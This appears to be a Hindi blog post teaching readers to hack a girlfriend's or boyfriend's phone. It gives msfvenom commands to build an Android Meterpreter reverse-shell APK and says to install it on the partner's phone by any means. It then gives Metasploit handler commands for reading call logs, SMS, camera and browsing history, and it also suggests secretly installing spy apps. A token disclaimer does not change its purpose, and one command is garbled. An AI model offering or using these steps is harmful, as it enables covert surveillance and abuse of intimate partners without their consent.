अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

निष्कर्ष - अब आपको पता चल गया होगा की अपने मोबाइल से किसी का भी मोबाइल हैक कैसे करे. इस पोस्ट में मेने आपको मोबाइल हैक करने के लिए कौन सा ऐप है? भी बताया है. मेने आपको दो तरीके की जानकारी दी जिसमे यदि आप बड़ी ही चतुराई से किसी का मोबाइल हैक करना चाहते हैं तो स्पाई ऐप का यूज करें पर इसमें आपको पैसे खर्च करने होते हैं एवं दूसरा बिलकुल फ्री तरीका है जिसमे आप कोई पैसा नहीं देना होता है पर इसमें आप पकड़े जा सकते हैं. यदि आपको ये पोस्ट अच्छी लगी हो तो इसे शेयर जरूर करें.

क्या आपको भी बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे? की जानकारी चाहिए, तो आज की पोस्ट में मै आपको बताऊंगा की बिना छुए मोबाइल हैक कैसे किया जाता है. यदि आप भी अपने किस के मोबाइल पर 24 घंटे नजर रखना चाहते हैं तो ये पोस्ट आपके बहुत काम की है. इस पोस्ट में आप 5 मिनिट के अंदर किस के भी मोबाइल को हैक कर सकते हैं. बढ़ी बात तो ये है की इसके लिए आपको किसी हैकिंग कोर्स की भी जरूरत नहीं है. इस पोस्ट में आपको कुछ तरीके बताने वाला हूँ जिसे किसी के भी मोबाइल को हैक किया जा सकता है. तो चलिये जानते हैं की किसी दूसरे का मोबाइल हैक कैसे करें ?

वैसे तो किसी के भी मोबाइल को हैक करना काफी मुश्किल काम है पर इस पोस्ट से आपको काफी आसान लगने लगेगा. यदि आप किसी से प्यार करते हैं और आपको लगता है की वो आपको धोखा दे रहा है तब हमें मोबाइल हैक करने की जरूरत पड़ती है, ताकि हम उस पर किसी न किसी तरह से नजर रख सकें.

अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे?

एंड्राइड एक ऐसी किताब है जिसको कोई कितना भी चाहे तो पूरा नहीं पढ़ सकता है. अब आप समझ जाएँ कि किस का मोबाइल हैक करना कितना कठिन है. किसी के मोबाइल को हैक करना बच्चों का खेल नहीं है. वो भी बिना फोन टच किये. यदि आपको किस के मोबाइल को हैक करना है तो कम से कम 5 मिनिट के लिए उसका मोबाइल आपके हाथ में होना चाहिए.

अब आप बोलेंगे की आपने टाइटल में तो बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे?दिया है की तो इसके लिए भी एक तरकीब है लेकिन इसके लिए आपको हैकिंग की पूरी जानकारी होना चाहिए.

यदि आप सामने वाले का मोबाइल हैक कर लेते हैं तो आपको उसके मोबाइल में होने वाली सभी जानकारी मिलती रहती है जैसे वाह्ट्सएप, वीडियो कॉल, कॉल लोग, मेसेज आदि. यदि आपको हैकिंग की बिलकुल भी नॉलेज नहीं तो इस पोस्ट में आपको इतने इजी तरीके से बताया जाएगा की आपको कोई दिक्कत नहीं होगी.

नोट - "सबसे पहले ये जान लें की ये पोस्ट गैर कानूनी कामों को बढ़ावा देने के लिए नहीं लिखी जा रही है. ये पोस्ट केवल नॉलेज के लिए है की ऐसा भी हो सकता है और न हीं इस पोस्ट का मकसद किसी को नुक्सान पहुँचाना है. पाठकों से भी निवेदन है इसका यूज किसी को नुक्सान पहुंचाने में न करें"

Kali Linux के द्वारा किसी दूसरे का मोबाइल हैक कैसे करे?

यदि आपके पास लैपटॉप या कंप्यूटर उपलब्ध है तो आप काली लिनक्स से किसी भी मोबाइल पर निगरानी रख सकते हैं. किसी के भी मोबाइल को हैक करने के लिए सबसे शानदार तरीका है स्पाई एप, पर सभी पेड होते हैं फ्री नहीं होते हैं. 

पर ये एक ऐसी विधि है जिसमें आपको पैसा खर्च नहीं करना पढता है बिलकुल फ्री में किसी भी मोबाइल पर नजर रख सकते हैं. इसके लिए आप केवल कंप्यूटर लीजिए और खुद का Payload Creat कर Hacking का मजा लीजिये. कैसे करना है वो आगे पढ़ते रहिये.

  • जानिए आपकी गर्लफ्रेंड किस्से व्हाट्सएप चैट कर रही है

Step 1. सबसे पहले काली लिनक्स में टर्मिनल को खोलें और नीचे दी हुई कमांड को लिखें.

MSFVENOM -P ANDROID/METERPRETER/REVERSE_TCP LHOST=170.14.22.211 R > LPORT=1234 /ROOT/Technology4every1.APK

MSFVENOM - यह इसी का एक टूल है जिसको रिवर्स इंजीनियरिंग में उपयोग किया जाता है.

P ANDROID/METERPRETER/REVERSE_TCP - यहाँ पर हम अपने मोबाइल के लिए Payload Creat कर रहे हैं हैं और P का मतलब Payload  होता है इसीलिए यहाँ पर एंड्राइड लिखेंगे.

LHOST - इस जगह आपको अपने मोबाइल का IP Adress भरना है.

जरूरी - काली लिनक्स में आप एक नया टर्मिनल ओपन करें और कमांड ifconfig देना है, जिससे आप अपना आईपी एड्रेस चेक कर सकते हैं.

LPORT - इसके जरिये आप लोकल पोर्ट सेट कर सकते हैं, 1234 की जगह आप कुछ भी नंबर सेट कर सकते हैं

/ROOT/Technology4every1.APK - यह आपके Payload का नाम और Path है. आप चाहें तो अपने हिसाब से नाम दे सकते हैं, जैसे /ROOT/apkaname.APK.

ऊपर जो आपको कमांड बतायी गयी है उसे टाइप करें और Enter प्रेस कर दें , तो आपके सामने एक काली विंडो ओपन होगी जो नीचे दी गयी है.

अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

Step 2. अब आपका Payload Create हो गया है जिसको आप अपने कंप्यूटर में रुट फोल्डर में देख सकते हैं.

अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

Step 3. इसके बाद आपको इस Technology4every1.apk Payload को अपने गर्लफ्रेंड या बॉयफ्रैं के मोबाइल में सेंड कर देना है और किसी भी तरीके से इनस्टॉल कर देना है.

सामने वाले के मोबाइल में Payload इंस्टॉल होने के बाद ओपन करें और फिर अपने काली लिनक्स कंप्यूटर में नीचे कमांड दी गयी हैं जिनको बारी बारी से टाइप करना है.

  • मोबाइल हैक करने के लिए सॉफ्टवेयर फ्री डाउनलोड

Step 4. इसके बाद सबसे पहले अपने काली लिनक्स टर्मिनल में कमांड msfconsole टाइप करना है.

अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

Step 5. ऐसा करते ही आपके कंप्यूटर में metasploit framework console स्टार्ट हो जाएगा जिसमे थोड़ा समय लग सकता है.

Step 6. अब metasploit framework console खुलने के बाद नीचे दी गयी कमाण्ड को बारी बारी से टाइप कर देना है.

use exploit multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.111 (यहां पर आपको अपना लोकल IP डालना है)

set lport 4444

exploit

यदि आपने सही तरीके से ऊपर दी हुई कमांड एक एक करके एंटर कर दिया तो आप अपने पार्टनर के मोबाइल से जुड़ जाएंगे.

अपने मोबाइल से दुसरे का मोबाइल कैसे हैक करे - apane mobail se dusare ka mobail kaise haik kare

Step 7. मुबारक हो आपने अपने गर्लफ्रेंड या बॉयफ्रेंड का मोबाइल हैक कर लिया है. अब वो जो भी अपने फोन में करेगा आपको जानकारी मिलती रहेगी जैसे कॉल लोग, Camera, ब्राउज़िंग हिस्ट्री, एस एम एस की जानकारी आदि.

आपको यदि ये जानना हो कि किस किस कमांड से क्या क्या होता है तो इसके लिए अपने टर्मिनल में लिख दें जानकारी मिल जायेगी.

  • बिना थर्ड पार्टी एप के फॉर्मेट मोबाइल से पुरानी फोटो कैसे रिकवर करे
  • मोबाइल और व्हाट्सएप्प हैक कैसे हटाये ?
  • गर्लफ्रेंड/बॉयफ्रेंड या दूसरे का Whatsapp अकाउंट आपके फोन पर कैसे हो जाएगा ओपन
  • अपने गर्लफ्रेंड-बॉयफ्रेंड की कॉल रिकॉर्डिंग अपने मोबाइल पर कैसे सूने

मेने आपको गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे ? और किसी दूसरे का मोबाइल हैक कैसे करें ? की जानकारी देने की कोसिस करी है यदि कोई स्टेप में किसी भी प्रकार के प्रॉब्लम आये तो कमेंट करें. एक बात का जरूर ध्यान रखें की, किसी को कोई नुक्सान न हो मेरी इस पोस्ट से.

किसी का मोबाइल हैक करने के लिए क्या क्या चाहिए?

अगर आप किसी के फ़ोन को हैक करना चाहते है तो कुछ समय के लिए उनका फ़ोन अपने पास रखे और उसमे Spy एप्लीकेशन छुपके से इनस्टॉल कर दे. जब आप Spy एप्प फ़ोन में इनस्टॉल कर देते हो तब लगभग आपका काम पूरा हो जाता है. अब आप जिस भी कंपनी का Spy एप्लीकेशन इस्तेमाल कर रहे हो उनकी वेबसाइट पर जाये और अपना अकाउंट लोग इन करे.

क्या कोई मेरे मोबाइल को हैक कर सकता है?

ऑनलाइन अकाउंट्स को चेक करें अगर आपको बार-बार अकाउंट लॉगइन के कई मैसेज आने लगे तो भी आपका फोन हैकिंग का शिकार हो सकता है. इसके अलावा अपने सोशल मीडिया अकाउंट्स को चेक करें. अगर आपको किसी संदिग्ध लॉगइन की जानकारी मिलती है, तो समझ लीजिए कि किसी ने फोन हैक कर लिया है.

हैक करने का मतलब क्या होता है?

HACK MEANING IN HINDI - EXACT MATCHES उदाहरण : अगर कुछ हो भी जाता है तो मैं कोई-न-कोई जुगाड़ कर लूँगा। उदाहरण : जिस चीज को आप बदल नहीं सकते हैं, आपको उसे अवश्य ही सहन करना चाहिए. उदाहरण : अमरनाथ जाने वाले कई यात्री hack पर चढ़ कर यात्रा करते हैं. उदाहरण : मैं टैक्सी का इंतेज़ार कर रहा था।

दुनिया का सबसे बड़ा हैकर कौन है?

Kevin Mitnic दुनिया का सबसे बड़ा Hacker है। Kevin Mitnic ने मात्र 14 साल की उम्र ऐसे ही बड़ी-बड़ी कंपनियों की Computer Hack कर लिए थे।